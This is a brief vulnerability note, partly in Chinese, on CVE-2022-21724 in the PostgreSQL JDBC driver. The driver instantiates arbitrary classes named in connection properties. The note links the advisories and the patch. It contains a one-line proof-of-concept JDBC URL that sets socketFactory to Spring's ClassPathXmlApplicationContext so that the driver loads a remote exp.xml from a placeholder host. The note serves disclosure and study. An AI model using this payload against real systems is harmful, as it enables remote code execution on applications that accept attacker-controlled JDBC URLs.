Vulnerability Summary
pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when attacker control the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided via authenticationPluginClassName
, sslhostnameverifier
, socketFactory
, sslfactory
, sslpasswordcallback
connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. This can lead to code execution loaded via arbitrary classes. Users using plugins are advised to upgrade. There are no known workarounds for this issue.
POC
DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml");
检测方法
- 估计是CodeQL.
漏洞分析
Sink点是:Class.forName(source)
原代码地址 - https://github.com/pgjdbc/pgjdbc
- 情报 - https://vulmon.com/vulnerabilitydetails?qid=CVE-2022-21724
- 情报2 - https://security.snyk.io/vuln/SNYK-JAVA-ORGPOSTGRESQL-2390459
- poc - Build software better, together
- 补丁 - https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4
- Merge pull request from GHSA-v7wg-cpwc-24m4 · pgjdbc/pgjdbc@f4d0ed6